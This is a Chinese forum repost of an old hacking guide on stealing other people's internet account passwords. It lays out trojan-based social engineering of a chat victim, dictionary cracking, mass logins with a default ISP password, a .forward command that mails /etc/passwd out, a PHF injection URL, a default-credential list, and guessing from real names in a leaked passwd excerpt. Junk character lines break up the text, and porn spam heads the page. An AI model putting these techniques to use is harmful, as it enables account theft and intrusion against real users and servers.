国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集
汶上信息港
標題:
如何得到別人的上網(wǎng)帳號和密碼
[打印本頁]
作者:
雜七雜八
時間:
2011-1-12 21:03
標題:
如何得到別人的上網(wǎng)帳號和密碼
如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。
6 c5 x# h* H4 s) z3 g" Y0 F
方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。
. ^% C$ r; z: `1 I
優(yōu)點:只要對方運行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點,只是......
$ T1 u. i! r D9 b4 N
缺點:只有一個,那就是如何讓對方乖乖的運行你的程序。
: x* u" V9 X+ g5 J8 R( o$ n
提示:先問清你的目標和你是不是在一個城市。
3 I- x: y% M# H# e
實戰(zhàn)演戲:一天,我在X海聊天室里尋找目標,遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。
8 b+ z# v5 p% p0 @' ?( L; t
哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。
0 k8 _' r. b. L" X- f. G
忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點上網(wǎng)以避免撞車。
+ E, r5 W/ ]; R& q
方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客
) ]2 \$ c7 Q. t) O2 l
優(yōu)點:沒什么優(yōu)點
; W# |# f. k+ r
缺點:要具體情況具體對待,太麻煩
3 p1 S# t+ P3 ~% b" B
提示:平時多多留神。
0 C1 {! `& a% I
譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net
* ~6 O. a' ~( ]6 L0 x, q0 C, V
密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。
* b0 j! o: ~4 ^0 K' {
運行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機子要是快可以開上三四個窗口,套上不同的字典一起破
7 n X9 [2 i; y
方案三:侵入郵局主機然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。
0 h$ H( C+ o+ b: h* }
優(yōu)點:一次可以破出好多帳號,而且如果運氣好還能拿到ROOT,這個主機就要歸你控制了。而且破解時不用上網(wǎng),可以好幾臺機子一起破。
9 x( P8 o" j5 }' [, @
缺點:對于初學者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴重且性質(zhì)惡劣,一定要慎重對待。
0 @/ ?) G4 n1 c3 d" ~% ^
由于介紹此類的教學文章比較多,我就不班門弄斧了。
( \3 o# X2 _) X9 A% @2 b8 J G
( b8 }( S0 i+ Q# W
哈哈,我來說說最簡單的入侵方法。其實入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。
) }9 K. M. D2 G3 ~
只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。
- S% `- X ^/ ]
有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機器自動回信,信的大概格式如下:
. u; I" p5 F# @4 i
) m) m: P, X3 e n2 F
------------------------------
/ G8 b( {2 g6 U8 X! V4 l2 D7 e
- ~% X( C2 l# x4 z9 J
XXX,你好(XX是你在表格上填的名字)
5 S: P( L( f- x' C
你在XX熱線的主頁空間已開通
. T# [; e! h: T" O
帳戶名:XXX 密碼:11
9 ~& R6 _1 m0 y2 F! U( }
-----------XX熱線
4 \& `* |4 C, x y6 l8 g* C" r- _
電話:XXXX-XXXXXXXX
, Z3 s# l1 } i. y( H
------------------------------
9 F( H" _0 P' H( q3 u2 W9 C( b( R
4 d# g8 n( e5 n! k9 }% |$ S0 ?
好了,由于是機器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機去改,有許多網(wǎng)友并沒有接觸過如何T主機,所以他們使用的還是初始密碼11。
# y6 i% \' g* F
開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準能行。輸入AA。。。進去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。
2 m' ~/ c/ `3 `& P+ K+ |, h
上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點話的站臺就要耗費你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!
& d% a0 b2 c) G3 |" k- h' ~% \4 S
* @0 t2 d- P9 n8 w
* G% u) }" a" C6 _' D
如何獲得第一個帳號
/ N+ `2 m) x: h
$ T) ]+ H6 o$ Q* _: `5 r
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點找到對應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費盡力氣也得不到,后來總算是積累了一些經(jīng)驗,想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我.
8 F% N. a9 K' V* S5 l' @. P
8 z5 T! B- Z2 J4 P5 H( s% ?
確定了目標以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當然是假的),進入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail
me@my.e-mail.addr
" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。
, y+ ]! k \/ w
" t! s: G, s3 W( Z% a: w
如果目標沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.
1 ]* [0 |. x+ _
( L% A3 K) E* ]/ z& E/ B8 ~
以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-<
1 v6 x7 Z4 ]# N5 a2 V0 }
, q: ?8 m0 Q' M! c* G
還可以利用目標的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標,一旦有人登陸該主機就會報告給你.但這種方法的缺點就是浪費時間,如果你是自己花錢上網(wǎng)的話可就要出血了!
. f/ }! ~( H2 q" q6 j" M
; _, D9 L' Y* A' ]
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認的帳號,例如:
2 q1 h j" |8 f( F @2 z
+ L9 t* t7 m: a n, J/ p4 I
帳號 密碼
4 N+ Y0 b% K: _; ]
----------- ----------------
( p4 {7 N6 n5 x/ H3 p% V& H
root root
) T4 u4 s5 W# r, J
sys sys/system/bin
- l! X6 N8 V: R. g8 x
bin sys/bin
+ B: ~2 ]4 J. q' g) j6 @
mountfsys mountfsys
. D' P$ y# S! J% q5 \( {/ O: y
adm adm
3 w# }" p- h& d: f) P
uucp uucp
! M/ o; g' X+ q8 [" o8 b
nuucp anon
, C& b6 Q" ]* S- b* j
anon anon
( i" N( w+ S# F. v F
user user
, B8 H9 y8 y0 i0 J& p% f
games games
' f0 \5 k( r1 i/ z
install install
( @3 M3 \! w9 O8 _- J# ?0 Y
reboot 給 "command login" 用的
/ Q3 G5 P( E, F% f) j% i- F0 a, j
demo demo
! Y5 o0 U" E/ d8 Z/ h5 p- [) G
umountfsys umountfsys
. N5 \0 j; G& h4 D# z3 ?
sync sync
: O: T0 L. m/ V5 z- e# N$ ?, a: V
admin admin
4 p' V v+ J0 G) w6 O' J; y5 j
guest guest
) N1 X2 G# E7 B$ k. N2 e. Y
daemon daemon
e) Z9 K* ^. q* Q B/ c
________________________________________________________________
+ X9 I9 i# Q' _# A) e
! j3 |, y! O t: X$ {! ~
有些管理員忘記把他們改掉,那你就發(fā)財了!
5 C4 t7 S& U, e) Q6 n& G
; V, z: u: E4 N3 Z* Y
另外還有一些習慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.
! k0 s, u/ M4 h! i
, y$ x" c# G4 J: K
只有帳號還不能進入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應(yīng)該會發(fā)現(xiàn)該用戶的許多信息,例如:
# |. a* a2 A+ J$ b0 y
4 p; o" ~/ ~' ~6 a: Z( P0 }; o6 a: ~
.........
, o2 z X+ D* O1 J" x+ Q
2 w5 w) i$ A, |9 r4 O& J: b
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
5 m: ?/ F. l4 h5 q
" j k: C9 E$ G. Y3 W
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
8 O: m- s2 q+ `' q3 p
; j- Y/ ^( w( X3 j5 [( A
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
; p% E ~6 @: q0 A2 g
* O5 q9 t" R9 @# _4 x. `
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
8 U: N% f# V, o/ w5 O+ |
9 Y! f ~" {3 U; k* K
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
# w( z* m0 l, J
1 H- l$ v! z' U, }% ?* ?' b/ }
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
4 U* F3 M* T" @( [$ c) o7 ~5 H' e; k8 G
5 _2 v$ Y' x+ g( E' a1 ^8 D
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
2 t" D0 X8 V' b+ S" G) X" h
$ O& [0 [ b _+ @3 ~
............
+ f6 Y9 Y/ n1 M& D4 |0 t ]' W$ Y
4 T; m+ t% W6 u0 a7 u- F$ y7 }
這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實姓名,對!就用它來做密碼試.成功率還是比較高的.
( @ I5 L, h5 B. X7 W
+ V; z B1 m( ]$ h- _3 f) ^( m
如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察
support@xxx.xxx.xxx
會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察
support@xxx.xxx.xxx
會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜.
# i! C- o% T% \, P. I
* B1 Q) Q/ p& K- C3 K! n
當然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費一番工夫來猜的.
' D* L% b) A6 c& A9 O3 o3 u7 h
$ U' o0 W$ J% P( `
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費就要.....而且這種方法比較危險,還是不用為好.
. Q$ \0 ]9 ~* w, v: ~ s0 q
; E$ _& K R2 T7 b
最后實在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.
- s, ~. D2 R- L$ O' e S- z
- b, L, H- U0 R$ t% T
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因為我也不知道更好的方法.但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.
$ C# V* t- l$ E& ?! X0 L
% h6 q, Z; ~0 k/ q( n) O
歡迎光臨 汶上信息港 (http://yh18.cn/)
Powered by Discuz! X3.5